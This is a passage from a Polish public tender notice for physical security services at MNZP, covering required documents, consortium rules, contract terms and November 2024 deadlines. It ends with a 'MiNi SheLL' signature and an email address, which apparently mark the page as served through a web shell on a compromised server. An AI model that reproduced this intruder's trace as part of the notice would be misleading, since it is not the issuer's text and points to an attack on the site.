bezpośredniej ochrony fizycznej i zabezpieczenia technicznego.<br/>-polisę ubezpieczeniową ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 100 000 zł.<br/>- wykaz osób skierowanych do realizacji zamówienia z oświadczeniem, że nie zostali skazani – załącznik nr 7 do SWZ(dysponuje i skieruje do realizacji zamówienia kwalifikowanych pracowników ochrony fizycznej, niekaranych za przestępstwo umyślne, zapewniając możliwość podjęcia skutecznych działań w określonym czasie zgodnie z wymaganiami zamawiającego określonymi w Zał. nr 1 – Szczegółowym opisie Przedmiotu Zamówienia)<br/>- wykaz usług potwierdzonych referencjami – załącznik nr 8 do SWZ(należycie wykonał lub należycie wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej2usługi o charakterze i złożoności porównywalnych z przedmiotem i zakresem niniejszego zamówienia. Każda usługa musi być świadczona na podstawie odrębnej umowy, trwającej nieprzerwanie min. 6 miesięcy, o wartości brutto min. 150 000 zł. Za usługę wykonywaną w okresie ostatnich 3 lat przed upływem terminu składania ofert zamawiający uzna usługę, której data rozpoczęcia przypada w tym okresie)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> -Zobowiązanie podmiotu udostępniającego zasoby-Załącznik nr 4 – jeżeli dotyczy<br/>-Oświadczenia podmiotu udostępniającego zasoby-Załącznik nr 4a –jeżeli dotyczy<br/>-Klauzula informacyjna RODO-Załącznik nr 5–jeżeli dotyczy<br/>-Pełnomocnictwo- gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie<br/>zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują w formularzu oferty, które usługi wykonają<br/>poszczególni wykonawcy.<br/>4. Oświadczenia dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektowanymi postanowieniami umowy- załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-13 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mnzp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-13 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca zobowiązany jest, aby przez cały okres trwania Umowy realizować niniejsze zamówienie wyłącznie przez<br/>pracowników zatrudnionych na podstawie umowy o pracę, tzn. aby każda roboczogodzina była wypracowana w sposób<br/>określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (tj. Dz. U. z 2023 r. poz. 1465 z późn. zm.) –<br/>wymaganie nie dotyczy pracowników ochrony wykonujących czynności grupy interwencyjnej, zewnętrznego uzbrojonego<br/>stanowiska interwencyjnego monitorującego alarmy, czynności konwojowych i innych niezwiązanych z bezpośrednią<br/>ochroną fizyczną wykonywaną na terenie MNZP.

Creat By MiNi SheLL
Email: jattceo@gmail.com